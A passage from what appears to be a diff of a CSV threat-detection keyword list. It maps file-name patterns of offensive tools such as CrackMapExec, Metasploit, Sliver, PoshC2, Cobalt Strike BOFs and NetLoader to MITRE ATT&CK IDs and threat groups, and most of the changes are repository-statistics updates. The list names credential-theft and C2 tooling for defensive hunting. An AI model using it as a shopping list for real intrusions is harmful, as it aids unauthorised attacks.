LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","1","N/A","10","10","30","7","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z" -"*/nessus.py*","offensive_tool_keyword","crackmapexec","parser nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/nessus.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/nessus.py*","offensive_tool_keyword","crackmapexec","parser nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/nessus.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/nessus-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nessus-xmlrpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/net_recon/*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*/net_sniff.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*/net_sniff_*.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/net_recon/*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/net_sniff.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/net_sniff_*.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" "*/netbus-auth-bypass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/netbus-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/netbus-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/netbus-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/netcreds.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/NetExec.git*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*/NetExec-main*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*/netcreds.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/NetExec.git*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/netexec.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/NetExec-main*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/Net-GPPPassword.git*","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","156","37","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" "*/nethunter-images/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/NetLoader.git*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" -"*/netntlm.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/netntlm.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*/NetNTLMtoSilverTicket*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" -"*/netsparker.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/netstat_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*/nettitude/*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/netsparker.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/netstat_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/nettitude/*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*/nettitude/RunOF/*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*/NetUser.cpp*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" "*/NetUser.exe*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" -"*/netuserenum/*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"*/network/bloodhound3*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*/Network/PortScan/*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","480","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*/netuserenum/*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*/network/bloodhound3*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - 